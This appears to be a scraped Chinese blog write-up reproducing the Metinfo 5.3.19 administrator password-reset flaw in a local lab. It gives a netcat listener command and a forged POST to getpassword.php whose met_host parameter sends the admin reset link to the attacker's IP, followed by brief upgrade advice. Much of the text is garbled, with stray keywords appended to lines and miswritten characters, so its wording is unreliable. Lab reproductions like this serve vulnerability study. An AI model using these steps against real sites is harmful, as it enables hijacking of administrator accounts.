Metinfo 5.3.19管理员密码重置漏洞复现
Metinfo 5.3.19管理员密码重置漏洞php
操做系统:Windows 10专业版 kali linuxlinux
网站环境:UPUPW 5.3浏览器
使用工具:burpsuite 1.7 beta工具
漏洞分析
#密码重置过程当中验证不严优化
#漏洞涉及到的几个文件分别是:网站
admin/admin/getpassword.phpui
include/common.inc.phpspa
include/jmail.php操作系统
include/export.func.phpblog
安装(请忽略我用QQ浏览器)
upupw默认数据帐户密码:root--root
漏洞复现
登录localhost/metinfo/admin点击忘记密码
用burp抓包
在kali虚拟机上监听80端口
nc -lvvp 80
kali机器上IP为192.168.43.15
在burp repeater中构造http请求发送
POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15
这时候在咱们kali监听的80端口监听到了密码重置的连接
打开连接进入设置密码界面
我这里好几回没有监听到不知到是怎末回事重启了kali就能够了(计算机玄学吧有时候得信)
漏洞建议:
升级CMS版本
二次开发中优化登录代码避免逻辑错误
相关文章
- 1. Metinfo 5.3.19管理员密码重置漏洞复现
- 2. metinfo 5.3.19密码重置漏洞
- 3. Metinfo CMS 5.3.19 密码重置漏洞分析
- 4. DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(1)
- 5. 密码重置漏洞利用
- 6. Metinfo 6.1.2 SQL注入漏洞复现
- 7. 网站漏洞修复之metinfo SQL注入漏洞
- 8. 密码重置漏洞案例
- 9. 任意用户密码重置漏洞
- 10. 逻辑漏洞之密码重置
- 更多相关文章...
- • MySQL DISTINCT:去重(过滤重复数据) - MySQL教程
- • Swarm 集群管理 - Docker教程
- • IntelliJ IDEA代码格式化设置
- • IntelliJ IDEA 代码格式化配置和快捷键
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Appium入门
- 2. Spring WebFlux 源码分析(2)-Netty 服务器启动服务流程 --TBD
- 3. wxpython入门第六步(高级组件)
- 4. CentOS7.5安装SVN和可视化管理工具iF.SVNAdmin
- 5. jedis 3.0.1中JedisPoolConfig对象缺少setMaxIdle、setMaxWaitMillis等方法,问题记录
- 6. 一步一图一代码,一定要让你真正彻底明白红黑树
- 7. 2018-04-12—(重点)源码角度分析Handler运行原理
- 8. Spring AOP源码详细解析
- 9. Spring Cloud(1)
- 10. python简单爬去油价信息发送到公众号
欢迎关注本站公众号,获取更多信息
